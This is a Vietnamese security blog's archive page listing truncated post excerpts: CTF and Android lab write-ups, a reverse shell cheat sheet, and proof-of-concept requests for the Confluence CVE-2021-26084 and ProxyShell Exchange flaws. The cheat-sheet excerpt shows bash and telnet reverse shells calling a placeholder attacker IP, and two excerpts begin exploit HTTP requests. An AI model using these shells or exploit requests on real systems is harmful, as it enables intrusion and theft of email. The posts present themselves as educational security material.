Author Archives: Nhat Truong

[Write-up] DamCTF 2021: web/bouncy-box

link: https://damctf.xyz/challs Ban đầu đây là 1 trò chơi, khi các bạn thua cuộc sẽ hiện ra khung đăng nhập tiếp sau đó khi ấn vào phần Scoreboard các bạn sẽ thấy hiện ra bảng xếp hạng, điều đặc việt ở đây là có 2 thành viên vip Nhìn vào đây mình đã nghĩ là chắcContinueContinue reading “[Write-up] DamCTF 2021: web/bouncy-box”

[Write-Up] Cookie Arena Session 1 (Web)

link: https://season1.cookiearena.org/challenges Web basic Hân Hoan Với bài này, để ý đề bài các bạn sẽ biết rằng bài này có liên quan đến cookie giờ thì xem nó có gì đặc biệt nào. Sau khi nhập linh tinh để đăng nhập thì mình nhận được 2 dòng này. Giờ mở cookie lên trong phần ApplicationContinueContinue reading “[Write-Up] Cookie Arena Session 1 (Web)”

Reverse Shell Cheat Sheet (Backconnect)

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Bash Reverse Shell bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 Telnet Reverse Shell telnet ATTACKING-IP 80 | /bin/bash | telnetContinueContinue reading “Reverse Shell Cheat Sheet (Backconnect)”

EVABSv4 write up [Part 1]

Đây là một lab về tấn công ứng dụng android cho những người mới bắt đầu pentest file apk. Người xây dựng lab này muốn giới thiệu cho những người mới bắt đầu với kiến thức hạn chế hoặc không biết về một số lỗ hổng trong ứng dụng Android. EVABS cung cấp các thửContinueContinue reading “EVABSv4 write up [Part 1]”

CVE-2021-26084-PoC Remote Code Execution vulnerability in Confluence Server

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” PoC test SSTI POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 Host: <snip> User-Agent: <snip> Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding:ContinueContinue reading “CVE-2021-26084-PoC Remote Code Execution vulnerability in Confluence Server”

Nắm bắt cơ bản Lập Trình Hướng Đối Tượng OOP

Tính kế thừa Nó cho phép xây dựng một lớp mới dựa trên các định nghĩa của lớp đã có. Có nghĩa là lớp cha có thể chia sẽ dữ liệu và phương thức cho các lớp con. Các lớp con khỏi phải định nghĩa lại, ngoài ra có thể mở rộng các thành phầnContinueContinue reading “Nắm bắt cơ bản Lập Trình Hướng Đối Tượng OOP”

[ProxyShell] Exchange server reading arbitrary emails tricks

“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Get inbox IDs POST /autodiscover/autodiscover.json?@foo.com/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@foo.com HTTP/1.1 Host: mail.example.com Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en Content-Type: text/xml User-Agent:ContinueContinue reading “[ProxyShell] Exchange server reading arbitrary emails tricks”

Các sơ đồ giao thức xác thực cơ bản

Xác thực theo hàm băm Xác thực hàm băm có salt Điều kiện ban đầu của giao thức: Alice đăng ký và ghi nhớ tài khoản (Alice, PA) Bob sinh giá trị ngẫu nhiên SA dành riêng cho Alice Bob lưu giữ định danh Alice cùng giá trị băm của PA||SA Các bước hoạt độngContinueContinue reading “Các sơ đồ giao thức xác thực cơ bản”

Hướng dẫn download phim từ các trang stream list file .ts

HLS là gì? HLS là một giao thức truyền phát dựa trên HTTP. HLS hoạt động bằng cách chia nhỏ một luồng thành một chuỗi các gói nhỏ. Khi luồng được phát, máy khách sẽ chọn một số luồng thay thế khác nhau chứa cùng thông tin được mã hóa với nhiều tốc độ dữ liệuContinueContinue reading “Hướng dẫn download phim từ các trang stream list file .ts”